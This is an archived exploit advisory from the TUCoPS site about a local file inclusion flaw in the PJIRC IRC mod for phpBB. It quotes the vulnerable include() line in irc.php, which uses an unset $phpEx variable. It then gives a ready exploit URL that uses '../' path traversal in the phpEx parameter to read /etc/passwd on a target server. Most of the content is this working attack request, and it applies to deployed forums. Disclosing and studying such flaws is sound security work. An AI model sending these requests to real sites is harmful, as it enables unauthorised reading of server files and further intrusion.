TUCoPS :: Web BBS :: Frequently Exploited :: bx2560.htm

phpBB PJIRC mod LFI
phpBB PJIRC mod LFI
phpBB PJIRC mod LFI


/*=0D
PJIRC mod phpBB Local File Include=0D
Discrovered by: 0in from DaRk-CodeRs Programming & Security Group! =0D
Contact: 0in(dot)email[at]gmail(dot)com=0D
Description: This is a simply irc applet to phpbb.           =0D
Download: http://www.hotscripts.pl/produkt-1998.html =0D 
HTTP://Dark-Coders.4rh.eu =0D 
=0D
Greetz to: All DaRk-CodeRs Team Members: die_anglel, m4r1usz, sun8hclf, djlinux, aristo89 =0D
*/=0D
$phpEx not defined ;(=0D
Vuln line:=0D
./irc.php:31 include($php_root_path. 'common.' .$phpEx);=0D
=0D
Exploit:=0D
=0D
http://target.com/[path]/irc.php?phpEx=[LFI]=0D 
Ex.=0D
http://target.com/forum/irc/irc.php?phpEx=./../../../../../../etc/passwd=0D 
=0D
//EoFF

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH